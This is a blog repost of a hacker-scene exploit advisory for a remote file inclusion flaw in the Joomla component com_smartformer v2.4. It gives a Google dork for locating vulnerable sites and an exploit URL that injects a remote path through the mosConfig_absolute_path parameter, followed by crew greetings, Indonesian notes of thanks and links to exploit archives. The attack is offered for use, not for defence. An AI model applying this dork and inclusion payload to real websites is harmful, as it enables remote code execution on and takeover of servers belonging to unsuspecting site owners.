Joomla Component com_smartformer v.2.4 RFI Vulnerability

=========================================================
Joomla Component com_smartformer v.2.4 RFI Vulnerability
=========================================================

[+]Title	 : Joomla Component com_smartformer v.2.4 RFI Vulnerability
[+]Software 	 : Joomla Smart Former v. 2.4
[+]Vendor 	 : http://www.itoris.com/
[+]Download 	 : http://www.itoris.com/joomla-form-builder-smartformer.html
[+]Author	 : jos_ali_joe
[+]Contact	 : josalijoe[at]yahoo[dot]com
[+]Home 	 : https://josalijoe.wordpress.com/

########################################################################

Dork : inurl:index.php?option="com_smartformer"

########################################################################

------------------------------------------------------------------------

RFI Exploit

Exploit :

http://example.com/components/com_smartformer/smartformer.php?mosConfig_absolute_path=[ Tecon - Crew ]

--------------------------------------------------------------------------

Thanx For :

./ guitariznoize - cassaprodigy - cH0cH0bEe - jimmyRomanticDevil - jurank_dankkal

./ ne0 d4rk fl00d3r - nesta - shadowsmaker - wongrantau - zee eichel - All admin , staff and member Tecon - Crew

Special Thanks :

/. Tecon - Crew

My Team : 

./Indonesian Coder

[+] Note : 

[+] Terima Kasih buat forum Tecon dari staff dan admin nya di sini kayak nya saya menemukan keluarga
    yang bisa terima saya apa adanya . dan mohon bimbingan dari agan2 Tecon semua ^:)^
    buat gan nesta thanks gan walaupun saya jarang chat sama gan nesta tapi tiap gan nesta coment pasti bikin ane terenyuh :P
    ane g' maho lho masih normal :P 

[+] Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.
    Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,
    Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.

Link : http://packetstormsecurity.org/1011-exploits/joomlasmartformer-rfi.txt
       http://securityreason.com/wlb_show/WLB-2010110011
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s